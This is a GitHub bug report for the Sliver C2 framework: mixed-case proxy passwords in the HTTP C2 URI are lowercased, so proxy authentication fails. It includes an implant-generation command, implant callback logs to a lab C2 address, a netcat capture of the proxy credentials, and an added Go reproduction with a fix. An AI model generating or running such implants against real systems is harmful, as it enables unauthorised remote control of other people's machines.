HTTP C2 URI lowercased, messing up proxy password #1126

Closed
akmalhisyam opened this issue Mar 2, 2023 · 0 comments
Labels
bug Something isn't working

akmalhisyam commented Mar 2, 2023

Password became lowercased, causing authentication to fail

=====================
Generate
=====================

sliver > generate --http http://192.168.10.10/?proxy=http://098789:HehEhEyyyYyy@192.168.38.1:8080 --debug --name test002-linux --os linux

[*] Generating new linux/amd64 implant binary
[*] Build completed in 44s
[*] Implant saved to /root/test002-linux

=====================
Run implant
=====================

[user@pc ~]$ ./test002-linux
2023/03/02 21:44:51 sliver.go:87: Hello my name is test002-linux
2023/03/02 21:44:51 limits.go:58: Limit checks completed
2023/03/02 21:44:51 sliver.go:105: Running in session mode
2023/03/02 21:44:51 session.go:67: Starting interactive session connection loop ...
2023/03/02 21:44:51 transports.go:41: Starting c2 url generator () ...
2023/03/02 21:44:51 transports.go:95: Return generator: (chan *url.URL)(0xc0000287e0)
2023/03/02 21:44:51 transports.go:83: Yield c2 uri = 'http://192.168.10.10?proxy=http://098789:heheheyyyyyy@192.168.38.1:8080'
2023/03/02 21:44:51 transports.go:83: Yield c2 uri = 'http://192.168.10.10?proxy=http://098789:heheheyyyyyy@192.168.38.1:8080'
2023/03/02 21:44:51 session.go:84: Next CC = http://192.168.10.10?proxy=http://098789:heheheyyyyyy@192.168.38.1:8080
2023/03/02 21:44:51 session.go:84: Next CC = http://192.168.10.10?proxy=http://098789:heheheyyyyyy@192.168.38.1:8080
2023/03/02 21:44:51 transports.go:83: Yield c2 uri = 'http://192.168.10.10?proxy=http://098789:heheheyyyyyy@192.168.38.1:8080'
2023/03/02 21:44:51 session.go:172: Connecting -> http(s)://192.168.10.10
2023/03/02 21:44:51 gohttp.go:97: Force proxy "http://098789:heheheyyyyyy@192.168.38.1:8080"
2023/03/02 21:44:51 gohttp.go:107: Proxy URL = 'http://098789:heheheyyyyyy@192.168.38.1:8080'
2023/03/02 21:44:51 httpclient.go:672: [http] segments = [], filename = sign-up, ext = php
2023/03/02 21:44:51 crypto.go:189: TOTP Code (2023-03-02 13:44:51.694866088 +0000 UTC): 72621053
2023/03/02 21:44:51 httpclient.go:339: [http] POST -> https://192.168.10.10/sign-up.html?cn=7l2621053&m=18h740664 (106 bytes)

======================
"Proxy"
======================

[user@pc ~]$ sudo nc -lvp 8080
Listening on 0.0.0.0 8080
Connection received on hehe 57280
CONNECT 192.168.10.10:443 HTTP/1.1
Host: 192.168.10.10:443
User-Agent: Go-http-client/1.1
Proxy-Authorization: Basic MDk4Nzg5OmhlaGVoZXl5eXl5eQ==

[user@pc ~]$ echo MDk4Nzg5OmhlaGVoZXl5eXl5eQ== | base64 -d
098789:heheheyyyyyy

moloch-- added the bug label Mar 2, 2023
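
The failure mode reported above, as an added Go example (not Sliver's code, and not part of the original issue). The issue does not show where the lowercasing happens, so `naiveNormalize` is a hypothetical stand-in for that step; `safeNormalize` and `proxyBasicAuth` are likewise hypothetical names. It lowercases only the scheme and host, which are the case-insensitive URI components under RFC 3986, and compares the resulting `Proxy-Authorization` Basic value.

```go
package main

import (
	"encoding/base64"
	"fmt"
	"net/url"
	"strings"
)

// URI copied from the generate command in the issue.
const issueURI = "http://192.168.10.10/?proxy=http://098789:HehEhEyyyYyy@192.168.38.1:8080"

// naiveNormalize is an assumed cause (hypothetical): lowercasing the whole string.
func naiveNormalize(raw string) string { return strings.ToLower(raw) }

// safeNormalize lowercases only the scheme and host; userinfo, path and query
// are case-sensitive and are left untouched.
func safeNormalize(raw string) (string, error) {
	u, err := url.Parse(raw)
	if err != nil {
		return "", err
	}
	u.Scheme = strings.ToLower(u.Scheme)
	u.Host = strings.ToLower(u.Host)
	return u.String(), nil
}

// proxyBasicAuth reads the proxy URL from the "proxy" query parameter and
// returns the Basic credential value a client would send to that proxy.
func proxyBasicAuth(c2 string) (string, error) {
	u, err := url.Parse(c2)
	if err != nil {
		return "", err
	}
	p, err := url.Parse(u.Query().Get("proxy"))
	if err != nil || p.User == nil {
		return "", fmt.Errorf("no usable proxy credentials (parse error: %v)", err)
	}
	pass, _ := p.User.Password()
	cred := p.User.Username() + ":" + pass
	return base64.StdEncoding.EncodeToString([]byte(cred)), nil
}

func main() {
	safe, _ := safeNormalize(issueURI)
	for _, uri := range []string{naiveNormalize(issueURI), safe} {
		b64, err := proxyBasicAuth(uri)
		fmt.Println(uri, "->", b64, err)
	}
}
```

The lowercased variant yields the same header value captured by `nc` in the issue, while the component-wise variant keeps the password's original case.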